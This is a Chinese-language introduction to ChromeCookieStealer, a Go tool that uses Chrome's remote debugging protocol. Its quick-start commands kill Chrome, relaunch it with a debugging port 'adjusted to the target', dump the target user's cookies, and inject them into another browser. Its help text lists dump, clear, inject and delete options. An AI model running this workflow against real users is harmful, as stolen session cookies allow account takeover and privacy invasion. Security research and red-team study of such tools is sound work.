关于ChromeCookieStealer

ChromeCookieStealer是一款功能强大的Cookie数据收集和注入工具,该工具需要配合Chrome使用,能够利用Chrome的远程DevTools(开发者工具)协议实现浏览器Cookie的数据收集、注入、清理和删除操作。

该工具支持使用Chrome自己的格式并以JSON对象形式转储Cookie数据,Cookie数据的加载和注入同样使用的是这类数据格式。

该工具仅供安全研究和测试使用,请勿将其用于其他目的。

功能介绍

1、转储Chrome浏览器的Cookie数据;
2、将转储的Cookie数据注入到其他Chrome实例中;
3、清理Chrome的Cookie数据;
4、编译过程中支持自定义设置;

工具下载

由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好Go语言环境。

接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/magisterquis/chromecookiestealer.git

然后切换到项目目录中,使用go build命令构建项目源码:

cd chromecookiestealer

go build

工具快速使用

构建完成后,执行下列命令即可收集目标用户Chrome浏览器中的Cookie数据:

pkill Chrome

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # 需要根据目标情况修改

./chromecookiestealer -dump ./cookies.json

下列命令可以将转储的Cookie数据注入到研究人员的本地浏览器中:

# 使用一个调试端口启动Chrome,具体可参考上面的命令

./chromecookiestealer -clear -inject ./cookies.json

工具帮助信息

Usage: chromecookiestealer [options]

Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)

and, in order and as requested:

 

- Dumps cookies

- Clears cookies

- Injects cookies

- Deletes selected cookies

 

Parameters for cookies to be deleted should be represented as an array of JSON

objects with the following string fields:

 

name   - 要删除的Cookie名称

url    -  删除跟指定域名或URL匹配的所有Cookie

domain - 仅删除指定域名的Cookie

path   - 仅删除指定路径的Cookie

 

Filenames may also be "-" for stdin/stdout.

 

Options:

  -chrome URL

     Chrome远程调试URL (默认为"ws://127.0.0.1:9222")

  -clear

     清理浏览器Cookie

  -delete file

     包含要删除Cookie参数的文件名称

  -dump file

     转储Cookie的文件名称

  -inject file

     需要注入的包含Cookie的文件名称

  -no-summary

     退出时不打印概述信息

  -verbose

     启用Verbose日志

其他编译选项

一般情况下,go build命令足够满足绝大部分用户的需求。如果你需要执行更有针对性的安全测试,可以在编译过程中使用“-ldflags '-X main.Foo=bar'”选项实现自定义配置。

变量

描述

DumpFile

转储Cookie的文件名称,在-dump中设置

InjectFile

需要注入的文件名称,在-inject中设置

DeleteFile


描述需要删除Cookie的文件名称,在-delete中设置


DoClear

是否需要清理Cookie,在-clear中设置


需要注意的是,上述所有的选项/变量默认都是未设置的。

许可证协议

本项目的开发与发布遵循BSD-3-Clause开源许可证协议。

项目地址

ChromeCookieStealer:https://github.com/magisterquis/chromecookiestealer"

参考资料

https://github.com/slyd0g/WhiteChocolateMacademiaNut
https://chromedevtools.github.io/devtools-protocol/tot/Network/#type-Cookie